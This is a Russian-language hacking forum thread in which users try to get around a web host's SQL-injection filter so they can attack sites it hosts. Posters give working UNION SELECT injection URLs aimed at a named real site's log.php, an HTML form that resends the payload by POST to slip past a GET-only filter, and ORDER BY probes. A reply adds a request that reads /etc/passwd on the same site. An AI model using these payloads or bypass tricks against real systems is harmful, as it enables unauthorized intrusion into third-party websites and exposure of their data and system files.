Не нащёл куда нажаловаться такчто пишу сюда :D

В общем сайты которые висят на этом хостинге никак неполучается сломать, чуть что-то нетак в SQL запросе и кадает на http://2.sweb.ru/insecure :mad: Я ваще думал что обойти никак низя, но нащёл сайт с SQL inj висящий на этом хостинге и задефейсеный :confused: МБ другая дыра там была, но я склоняюсь к скуле... В общем вот дырко http://www.flotov.net/log.php?id=1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,VERS ION()/*
если прописать from+table/* ... ну сами в общем пасмарите... Вопрос по хостингу, как обойти эту сраную фильтрацию, или как это назвать :(
Возможно-ли это ваще...

Анти-Фильтрация или Обход фильтрации запрещенных слов в MySQL:
https://forum.antichat.ru/thread56409-sweb.html

Ёлки, sweb... Я всё рыл на spaceweb =\
Спасибо

это не там где только гет фильтруеЦЦо

it's my, гы твой пост не посмотрел...

Эх! Прочитал я тему и был уверен что всё получится... А нет...
Навоял такую форму
<form method="post" action="http://www.flotov.net/log.php">
<input name="id" type="text" size="200"><br>
<input type="submit">
</form>
Взял существующий ID http://www.flotov.net/log.php?id=bdc26a63b13ccabfd478f160e46da358 и вбил bdc26a63b13ccabfd478f160e46da358 в поле, норм, сработало, тогда вбил bdc26a63b13ccabfd478f160e46da358'+ORDER+BY+1/* не сработало, а так работает http://www.flotov.net/log.php?id=bdc26a63b13ccabfd478f160e46da358'+ORDER +BY+1/*
Пробовал пару разных вариантов, 0 :(

[Update]
Щас подумал, мб вы имеете в виду
<form method="post" action="http://www.flotov.net/log.php?id=1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,VERS ION()+FROM+Users/*">
Но нет, редирект :mad:
P.S. Я звеняюсь, но я сваливаю спать, буду вечером :o

http://mebel.org.ua/cgi-bin/post.php

Всё нормально работает, только вот таблицы не подобрал

http://www.flotov.net/log.php?id=/etc/passwd

:D

Пилять, и в чём была моя ошибка, почему у меня не получалось? :mad: